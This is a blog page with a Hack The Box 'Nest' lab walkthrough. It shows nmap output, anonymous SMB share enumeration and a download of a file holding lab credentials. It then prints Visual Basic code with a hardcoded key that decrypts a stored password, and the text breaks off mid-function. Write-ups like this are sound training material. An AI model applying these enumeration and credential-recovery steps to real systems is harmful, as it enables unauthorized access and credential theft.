<!DOCTYPE html><html lang="en" > <!-- The Head v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><head> <script data-name="BMC-Widget" src="https://cdnjs.buymeacoffee.com/1.0.0/widget.prod.min.js" data-id="MatthewSpina" data-description="Support me on Buy me a coffee!" data-message="Saving for OSCP support me?" data-color="#FF813F" data-position="right" data-x_margin="18" data-y_margin="18"></script><meta name="google-site-verification" content="aX3D5Z_33yD5g5d_VyUvRr815unygKqjX0oJQDaf6Sw" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title>Matthew-Spina Blog</title><meta name="generator" content="Jekyll v3.8.7" /><meta property="og:title" content="Hack the box Nest walkthrough" /><meta name="author" content="Matthew Spina" /><meta property="og:locale" content="en_US" /><meta name="description" content="overview" /><meta property="og:description" content="overview" /><link rel="canonical" href="https://matthew-spina.github.io/Blog/posts/Hack-The-Box-Nest/" /><meta property="og:url" content="https://matthew-spina.github.io/Blog/posts/Hack-The-Box-Nest/" /><meta property="og:site_name" content="Matthew spina" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2020-06-01T19:46:00-05:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="Hack the box Nest walkthrough" /><meta name="twitter:site" content="@Matthew spina" /><meta name="twitter:creator" content="@Matthew Spina" /><meta name="google-site-verification" content="google_meta_tag_verification" /> <script type="application/ld+json"> {"@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"https://matthew-spina.github.io/Blog/posts/Hack-The-Box-Nest/"},"url":"https://matthew-spina.github.io/Blog/posts/Hack-The-Box-Nest/","author":{"@type":"Person","name":"Matthew Spina"},"description":"overview","headline":"Hack the box Nest walkthrough","dateModified":"2020-06-01T19:46:00-05:00","datePublished":"2020-06-01T19:46:00-05:00","@context":"https://schema.org"}</script> <!-- The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps Generated by: https://www.favicon-generator.org/ v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT license --><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png"><link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png"><link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png"><link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png"><link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png"><link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png"><link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png"><link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png"><link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png"><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png"><link rel="icon" type="image/png" sizes="192x192" href="/assets/img/favicons/android-icon-192x192.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/manifest.json"><meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="preconnect" href="cdn.jsdelivr.net"><link rel="dns-prefetch" href="cdn.jsdelivr.net"><link rel="preload" as="style" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous"><link rel="preload" as="style" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"><link rel="preload" as="style" href="/assets/css/post.css"><link rel="stylesheet" href="/assets/css/post.css"><link rel="preload" as="style" href="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.css"><link rel="stylesheet" href="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.css" /><link rel="preload" as="script" href="https://cdn.jsdelivr.net/combine/npm/jquery@3.4.1,npm/popper.js@1.15.0,npm/bootstrap@4.0.0/dist/js/bootstrap.min.js" crossorigin> <script src="https://cdn.jsdelivr.net/combine/npm/jquery@3.4.1,npm/popper.js@1.15.0,npm/bootstrap@4.0.0/dist/js/bootstrap.min.js"></script> <script src="/assets/js/dist/commons.js" async></script> <script src="/assets/js/dist/timeago.min.js" async></script><link rel="preload" as="script" href="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.js"> <script src="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.js" async></script> <script src="/assets/js/dist/toc.min.js" async></script> <script src="/assets/js/dist/tooltip-loader.min.js" async></script> <script src="/app.js" defer></script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column"> <!-- The Side Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="nav-wrapper"><div id="profile-wrapper" class="d-flex flex-column"><div id="avatar" class="d-flex justify-content-center"> <a href="/" alt="avatar"> <img src="/assets/img/sample/phpXqS7N5_c1AM.jpg" alt="avatar"> </a></div><div class="profile-text mt-3"><div id="site-title"> <a href="/">Matthew spina</a></div><div id="site-subtitle" class="font-italic">Security Analyst | Penetration Tester | Bug bounty hunter | Freelancer</div></div></div><ul class="nav flex-column"><li class="nav-item d-flex justify-content-center "> <a href="/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-home ml-3 mr-3 unloaded"></i> <span>HOME</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/categories/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-stream ml-3 mr-3 unloaded"></i> <span>CATEGORIES</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/tags/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-tags ml-3 mr-3 unloaded"></i> <span>TAGS</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/archives/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-archive ml-3 mr-3 unloaded"></i> <span>ARCHIVES</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/about/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-info ml-3 mr-3 unloaded"></i> <span>ABOUT</span> </a></li></ul></div><div class="sidebar-bottom d-flex flex-wrap justify-content-around mt-4"> <span id="mode-toggle-wrapper"> <!-- Switch the mode between dark and light. v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <i class="mode-toggle fas fa-sun" dark-mode-invisible></i> <i class="mode-toggle fas fa-moon" light-mode-invisible></i> <script type="text/javascript"> class ModeToggle { static get MODE_KEY() { return "mode"; } static get DARK_MODE() { return "dark"; } static get LIGHT_MODE() { return "light"; } constructor() { if (this.mode != null) { if (this.mode == ModeToggle.DARK_MODE) { if (!this.isSysDarkPrefer) { this.setDark(); } } else { if (this.isSysDarkPrefer) { this.setLight(); } } } var self = this; /* always follow the system prefers */ this.sysDarkPrefers.addListener(function() { if (self.mode != null) { if (self.mode == ModeToggle.DARK_MODE) { if (!self.isSysDarkPrefer) { self.setDark(); } } else { if (self.isSysDarkPrefer) { self.setLight(); } } self.clearMode(); } }); } /* constructor() */ setDark() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); } setLight() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); } clearMode() { $('html').removeAttr(ModeToggle.MODE_KEY); sessionStorage.removeItem(ModeToggle.MODE_KEY); } get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); } get isSysDarkPrefer() { return this.sysDarkPrefers.matches; } get isDarkMode() { return this.mode == ModeToggle.DARK_MODE; } get isLightkMode() { return this.mode == ModeToggle.LIGHT_MODE; } get hasMode() { return this.mode != null; } get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); } flipMode() { if (this.hasMode) { if (this.isSysDarkPrefer) { if (this.isLightkMode) { this.clearMode(); } else { this.setLight(); } } else { if (this.isDarkMode) { this.clearMode(); } else { this.setDark(); } } } else { if (this.isSysDarkPrefer) { this.setLight(); } else { this.setDark(); } } } /* flipMode() */ } /* ModeToggle */ let toggle = new ModeToggle(); $(".mode-toggle").click(function() { toggle.flipMode(); }); </script> </span> <span class="icon-border"></span> <a href="https://github.com/Matthew-Spina" target="_blank"> <i class="fab fa-github-alt"></i> </a> <a href="https://twitter.com/Matthew spina" target="_blank"> <i class="fab fa-twitter"></i> </a> <a href=" javascript:window.open('mailto:' + ['Matthew_Spina','protonmail.com'].join('@'))" > <i class="fas fa-envelope"></i> </a> <a href="/feed.xml" > <i class="fas fa-rss"></i> </a></div></div><!-- The Top Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Posts </a> </span> <span>Hack the box Nest walkthrough</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"> <!-- Fixed kramdown code highlight rendering: https://github.com/penibelst/jekyll-compress-html/issues/101 https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901 --><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>Hack the box Nest walkthrough</h1><div class="post-meta text-muted d-flex flex-column"><div> Posted <span class="timeago" data-toggle="tooltip" data-placement="bottom" title="Mon, Jun 1, 2020, 7:46 PM -0500"> Jun 1, 2020 <i class="unloaded">2020-06-01T19:46:00-05:00</i> </span> by <span class="author"> Matthew Spina </span></div></div><div class="post-content"><h1 id="overview">overview</h1><p><img src= /assets/img/commons/loading.png data-src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQp6n8OlbIe-xvrVv2gBLv8tpYLQuoiAIfZ-_lRWX_PX7T1wWBF&amp;usqp=CAU" alt="htb-Nest" /></p><p>tools used: nmap,smbclient,smbget, dot net fiddle, dnspy</p><h1 id="service-enumeration">service enumeration</h1><p>first, I run Nmap to find open ports, services, and service versions.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
</pre><td class="rouge-code"><pre>kali@kali:~/htb/nest<span class="nv">$ </span>Nmap <span class="nt">-T4</span> <span class="nt">-A</span> <span class="nt">-p-</span> 10.10.10.178 <span class="nt">-Pn</span>
Starting Nmap 7.80 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2020-05-27 15:43 EDT
Nmap scan report <span class="k">for </span>10.10.10.178
The host is up <span class="o">(</span>0.057s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
445/tcp open Microsoft-ds?
4386/tcp open unknown

| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe:
| Reporting Service V1.2
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions:
| Reporting Service V1.2
| Unrecognised <span class="nb">command</span>
| Help:
| Reporting Service V1.2
| This service allows <span class="nb">users </span>to run queries against databases using the legacy HQK format
| AVAILABLE COMMANDS <span class="nt">---</span>
| LIST
| SETDIR &lt;Directory_Name&gt;
| RUNQUERY &lt;Query_ID&gt;
| DEBUG &lt;Password&gt;
|_ HELP &lt;Command&gt;

1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Host script results:

|_clock-skew: 3m38s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| <span class="nb">date</span>: 2020-05-27T19:51:29
|_ start_date: 2020-05-27T19:41:37

Service detection performed. Please report any incorrect results at https://nmap.org/submit/.
Nmap did: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>301.07 seconds
kali@kali:~/htb/nest<span class="err">$</span>
</pre></table></code></div></div><p>the Nmap scan tells me that there are two ports open 445/smb and 4386/HQK reporting I SMB is what I am most familiar with so I will start with that.</p><h1 id="smb-share-enumeration">SMB share enumeration</h1><p>the following command lists the shares.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre><td class="rouge-code"><pre>kali@kali:~/htb/nest<span class="nv">$ </span>smbclient <span class="nt">-L</span> <span class="se">\\\\</span>10.10.10.178
Enter WORKGROUP<span class="se">\k</span>ali<span class="s1">'s password:

        Sharename      Type      Comment
        ---------      ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Data            Disk     
        IPC$            IPC      Remote IPC
        Secure$        Disk     
        Users          Disk     
SMB1 disabled -- no workgroup available
</span></pre></table></code></div></div><p>the Data share seams to be accessible anonymously.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
</pre><td class="rouge-code"><pre>kali@kali:~/htb/nest<span class="nv">$ </span>smbclient  <span class="se">\\\\</span>10.10.10.178<span class="se">\\</span>Data
Enter WORKGROUP<span class="se">\k</span>ali<span class="s1">'s password:
Try "help" to get a list of possible commands.
smb: \&gt; recurse on
smb: \&gt; ls
  .                                  D        0  Wed Aug  7 18:53:46 2019
  ..                                  D        0  Wed Aug  7 18:53:46 2019
  IT                                  D        0  Wed Aug  7 18:58:07 2019
  Production                          D        0  Mon Aug  5 17:53:38 2019
  Reports                            D        0  Mon Aug  5 17:53:44 2019
  Shared                              D        0  Wed Aug  7 15:07:51 2019

\IT
NT_STATUS_ACCESS_DENIED listing \IT\*
\Production
NT_STATUS_ACCESS_DENIED listing \Production\*
\Reports
NT_STATUS_ACCESS_DENIED listing \Reports\*
\Shared
  .                                  D        0  Wed Aug  7 15:07:51 2019
  ..                                 D        0  Wed Aug  7 15:07:51 2019
  Maintenance                        D        0  Wed Aug  7 15:07:32 2019
  Templates                          D        0  Wed Aug  7 15:08:07 2019
\Shared\Maintenance
  .                                  D        0  Wed Aug  7 15:07:32 2019
  ..                                 D        0  Wed Aug  7 15:07:32 2019
  Maintenance Alerts.txt             A       48  Mon Aug  5 19:01:44 2019
\Shared\Templates
  .                                  D        0  Wed Aug  7 15:08:07 2019
  ..                                 D        0  Wed Aug  7 15:08:07 2019
  HR                                 D        0  Wed Aug  7 15:08:01 2019
  Marketing                          D        0  Wed Aug  7 15:08:06 2019
\Shared\Templates\HR
  .                                  D        0  Wed Aug  7 15:08:01 2019
  ..                                 D        0  Wed Aug  7 15:08:01 2019
  Welcome Email.txt                  A      425  Wed Aug  7 18:55:36 2019
\Shared\Templates\Marketing
  .                                  D        0  Wed Aug  7 15:08:06 2019
  ..                                 D        0  Wed Aug  7 15:08:06 2019
smb: \&gt;
</span></pre></table></code></div></div><p>the <code class="language-plaintext highlighter-rouge">Maintenance Alerts.txt</code> and <code class="language-plaintext highlighter-rouge">Welcome Email.txt</code> look interesting you can retrieve them using the following commands.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre><td class="rouge-code"><pre>kali@kali:~/htb/nest<span class="nv">$ </span>smbclient  <span class="se">\\\\</span>10.10.10.178<span class="se">\\</span>Data
Enter WORKGROUP<span class="se">\k</span>ali<span class="s1">'s password:
Try "help" to get a list of possible commands.
smb: \&gt; cd \Shared\Maintenance
smb: \Shared\Maintenance\&gt; mget "Maintenance Alerts.txt"
Get file Maintenance Alerts.txt? Yes
getting file \Shared\Maintenance\Maintenance Alerts.txt of size 48 as Maintenance Alerts.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \Shared\Maintenance\&gt; cd ../Templates/HR
smb: \Shared\Templates\HR\&gt; mget "Welcome Email.txt"
Get file Welcome Email.txt? Yes
getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Welcome Email.txt (2.0 KiloBytes/sec) (average 1.1 KiloBytes/sec)
smb: \Shared\Templates\HR\&gt;
</span></pre></table></code></div></div><p>the “Welcome Email.txt” file has smb login creds</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre><td class="rouge-code"><pre>kali@kali:~/htb/nest$ cat Welcome\ Email.txt
We would like to extend a warm welcome to our newest member of staff, &lt;FIRSTNAME&gt; &lt;SURNAME&gt;

You will find your home folder in the following location:
\\HTB-NEST\Users\&lt;USERNAME&gt;

If you have any issues accessing specific services or workstations, please inform the
IT department and use the credentials below until all systems have been set up for you.

Username: TempUser
Password: welcome2019


Thank you
HR
</pre></table></code></div></div><p>TempUser has access to a visual basic project at Secure$\IT\Carl you can download all of carls files using the following command</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>smbget <span class="nt">-rR</span> smb://10.10.10.178/Secure<span class="nv">$/</span>IT/Carl/ <span class="nt">-U</span> TempUser
</pre></table></code></div></div><p>you can move the project files from /Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/ to <a href="https://dotnetfiddle.net/">dotnetfiddle.net</a> this lets us use the code to decrypt the encrypted password in <strong>RU_Config.xml</strong> the only change you need to make to the code is to add <code class="language-plaintext highlighter-rouge">System.Console.WriteLine(plainText)</code> before the decrypt function ends.</p><div class="language-vb highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
</pre><td class="rouge-code"><pre><span class="k">Imports</span> <span class="nn">System.Text</span>
<span class="k">Imports</span> <span class="nn">System.Security.Cryptography</span>
<span class="k">Public</span> <span class="k">Class</span> <span class="nc">Utils</span>
	<span class="k">Public</span> <span class="k">Class</span> <span class="nc">ConfigFile</span>
    <span class="k">Public</span> <span class="k">Property</span> <span class="nf">Port</span> <span class="ow">As</span> <span class="kt">Integer</span>
    <span class="k">Public</span> <span class="k">Property</span> <span class="nf">Username</span> <span class="ow">As</span> <span class="kt">String</span>
    <span class="k">Public</span> <span class="k">Property</span> <span class="nf">Password</span> <span class="ow">As</span> <span class="kt">String</span>

    <span class="k">Public</span> <span class="k">Sub</span> <span class="nf">SaveToFile</span><span class="p">(</span><span class="n">Path</span> <span class="ow">As</span> <span class="kt">String</span><span class="p">)</span>
						<span class="k">Using</span> <span class="n">File</span> <span class="ow">As</span> <span class="k">New</span> <span class="n">System</span><span class="p">.</span><span class="n">IO</span><span class="p">.</span><span class="n">FileStream</span><span class="p">(</span><span class="n">Path</span><span class="p">,</span> <span class="n">System</span><span class="p">.</span><span class="n">IO</span><span class="p">.</span><span class="n">FileMode</span><span class="p">.</span><span class="n">Create</span><span class="p">)</span>
            <span class="k">Dim</span> <span class="nv">Writer</span> <span class="ow">As</span> <span class="k">New</span> <span class="n">System</span><span class="p">.</span><span class="n">Xml</span><span class="p">.</span><span class="n">Serialization</span><span class="p">.</span><span class="n">XmlSerializer</span><span class="p">(</span><span class="ow">GetType</span><span class="p">(</span><span class="n">ConfigFile</span><span class="p">))</span>
            <span class="n">Writer</span><span class="p">.</span><span class="n">Serialize</span><span class="p">(</span><span class="n">File</span><span class="p">,</span> <span class="k">Me</span><span class="p">)</span>
        <span class="k">End</span> <span class="k">Using</span>
    <span class="k">End</span> <span class="k">Sub</span>

    <span class="k">Public</span> <span class="k">Shared</span> <span class="k">Function</span> <span class="nf">LoadFromFile</span><span class="p">(</span><span class="k">ByVal</span> <span class="n">FilePath</span> <span class="ow">As</span> <span class="kt">String</span><span class="p">)</span> <span class="ow">As</span> <span class="n">ConfigFile</span>
        <span class="k">Using</span> <span class="n">File</span> <span class="ow">As</span> <span class="k">New</span> <span class="n">System</span><span class="p">.</span><span class="n">IO</span><span class="p">.</span><span class="n">FileStream</span><span class="p">(</span><span class="n">FilePath</span><span class="p">,</span> <span class="n">System</span><span class="p">.</span><span class="n">IO</span><span class="p">.</span><span class="n">FileMode</span><span class="p">.</span><span class="n">Open</span><span class="p">)</span>
            <span class="k">Dim</span> <span class="nv">Reader</span> <span class="ow">As</span> <span class="k">New</span> <span class="n">System</span><span class="p">.</span><span class="n">Xml</span><span class="p">.</span><span class="n">Serialization</span><span class="p">.</span><span class="n">XmlSerializer</span><span class="p">(</span><span class="ow">GetType</span><span class="p">(</span><span class="n">ConfigFile</span><span class="p">))</span>
            <span class="k">Return</span> <span class="k">DirectCast</span><span class="p">(</span><span class="n">Reader</span><span class="p">.</span><span class="n">Deserialize</span><span class="p">(</span><span class="n">File</span><span class="p">),</span> <span class="n">ConfigFile</span><span class="p">)</span>
        <span class="k">End</span> <span class="k">Using</span>
    <span class="k">End</span> <span class="k">Function</span>
  
<span class="k">End</span> <span class="k">Class</span>
    <span class="k">Public</span> <span class="k">Shared</span> <span class="k">Function</span> <span class="nf">DecryptString</span><span class="p">(</span><span class="n">EncryptedString</span> <span class="ow">As</span> <span class="kt">String</span><span class="p">)</span> <span class="ow">As</span> <span class="kt">String</span>
        <span class="k">If</span> <span class="kt">String</span><span class="p">.</span><span class="n">IsNullOrEmpty</span><span class="p">(</span><span class="n">EncryptedString</span><span class="p">)</span> <span class="k">Then</span>
            <span class="k">Return</span> <span class="kt">String</span><span class="p">.</span><span class="n">Empty</span>
        <span class="k">Else</span>
            <span class="k">Return</span> <span class="n">Decrypt</span><span class="p">(</span><span class="n">EncryptedString</span><span class="p">,</span> <span class="s">"N3st22"</span><span class="p">,</span> <span class="s">"88552299"</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="s">"464R5DFA5DL6LE28"</span><span class="p">,</span> <span class="mi">256</span><span class="p">)</span>
        <span class="k">End</span> <span class="k">If</span>
    <span class="k">End</span> <span class="k">Function</span>

    <span class="k">Public</span> <span class="k">Shared</span> <span class="k">Function</span> <span class="nf">Decrypt</span><span class="p">(</span><span class="k">ByVal</span> <span class="n">cipherText</span> <span class="ow">As</span> <span class="kt">String</span><span class="p">,</span> <span class="n">_</span>
                                   <span class="k">ByVal</span> <span class="n">passPhrase</span> <span class="ow">As</span> <span class="kt">String</span><span class="p">,</span> <span class="n">_</span>
                                   <span class="k">ByVal</span> <span class="n">saltValue</span> <span class="ow">As</span> <span class="kt">String</span><span class="p">,</span> <span class="n">_</span>
                                    <span class="k">ByVal</span> <span class="n">passwordIterations</span> <span class="ow">As</span> <span class="kt">Integer</span><span class="p">,</span> <span class="n">_</span>
                                   <span class="k">ByVal</span> <span class="n">initVector</span> <span class="ow">As</span> <span class="kt">String</span><span class="p">,</span> <span class="n">_</span>
                                   <span class="k">ByVal</span> <span class="n">keySize</span> <span class="ow">As</span> <span class="kt">Integer</span><span class="p">)</span> <span class="n">_</span>
                           <span class="ow">As</span> <span class="kt">String</span>
        <span class="k">Dim</span> <span class="nv">initVectorBytes</span> <span class="ow">As</span> <span class="kt">Byte</span><span class="p">()</span>
        <span class="n">initVectorBytes</span> <span class="o">=</span> <span class="n">Encoding</span><span class="p">.</span><span class="n">ASCII</span><span class="p">.</span><span class="n">GetBytes</span><span class="p">(</span><span class="n">initVector</span><span class="p">)</span>
        <span class="k">Dim</span> <span class="nv">saltValueBytes</span> <span class="ow">As</span> <span class="kt">Byte</span><span class="p">()</span>
        <span class="n">saltValueBytes</span> <span class="o">=</span> <span class="n">Encoding</span><span class="p">.</span><span class="n">ASCII</span><span class="p">.</span><span class="n">GetBytes</span><span class="p">(</span><span class="n">saltValue</span><span class="p">)</span>
        <span class="k">Dim</span> <span class="nv">cipherTextBytes</span> <span class="ow">As</span> <span class="kt">Byte</span><span class="p">()</span>
		<span class="n">cipherTextBytes</span> <span class="o">=</span> <span class="n">System</span><span class="p">.</span><span class="n">Convert</span><span class="p">.</span><span class="n">FromBase64String</span><span class="p">(</span><span class="n">cipherText</span><span class="p">)</span>
        <span class="k">Dim</span> <span class="nv">password</span> <span class="ow">As</span> <span class="k">New</span> <span class="n">Rfc2898DeriveBytes</span><span class="p">(</span><span class="n">passPhrase</span><span class="p">,</span> <span class="n">_</span>
                                           <span class="n">saltValueBytes</span><span class="p">,</span> <span class="n">_</span>
                                           <span class="n">passwordIterations</span><span class="p">)</span>
        <span class="k">Dim</span> <span class="nv">keyBytes</span> <span class="ow">As</span> <span class="kt">Byte</span><span class="p">()</span>
        <span class="n">keyBytes</span> <span class="o">=</span> <span class="n">password</span><span class="p">.</span><span class="n">GetBytes</span><span class="p">(</span><span class="k">CInt</span><span class="p">(</span><span class="n">keySize</span> <span class="o">/</span> <span class="mi">8</span><span class="p">))</span>
        <span class="k">Dim</span> <span class="nv">symmetricKey</span> <span class="ow">As</span> <span class="k">New</span> <span class="n">AesCryptoServiceProvider</span>
        <span class="n">symmetricKey</span><span class="p">.</span><span class="n">Mode</span> <span class="o">=</span> <span class="n">CipherMode</span><span class="p">.</span><span class="n">CBC</span>
        <span class="k">Dim</span> <span class="nv">decryptor</span> <span class="ow">As</span> <span class="n">ICryptoTransform</span>
        <span class="n">decryptor</span> <span class="o">=</span> <span class="n">symmetricKey</span><span class="p">.</span><span class="n">CreateDecryptor</span><span class="p">(</span><span class="n">keyBytes</span><span class="p">,</span> <span class="n">initVectorBytes</span><span class="p">)</span>
				<span class="k">Dim</span> <span class="nv">memoryStream</span> <span class="ow">As</span> <span class="n">System</span><span class="p">.</span><span class="n">IO</span><span class="p">.</span><span class="n">MemoryStream</span>
				<span class="n">memoryStream</span> <span class="o">=</span> <span class="k">New</span> <span class="n">System</span><span class="p">.</span><span class="n">IO</span><span class="p">.</span><span class="n">MemoryStream</span><span class="p">(</span><span class="n">cipherTextBytes</span><span class="p">)</span>
        <span class="k">Dim</span> <span class="nv">cryptoStream</span> <span class="ow">As</span> <span class="n">CryptoStream</span>
        <span class="n">cryptoStream</span> <span class="o">=</span> <span class="k">New</span> <span class="n">CryptoStream</span><span class="p">(</span><span class="n">memoryStream</span><span class="p">,</span> <span class="n">_</span>
                                        <span class="n">decryptor</span><span class="p">,</span> <span class="n">_</span>
                                        <span class="n">CryptoStreamMode</span><span class="p">.</span><span class="n">Read</span><span class="p">)</span>
        <span class="k">Dim</span> <span class="nv">plainTextBytes</span> <span class="ow">As</span> <span class="kt">Byte</span><span class="p">()</span>
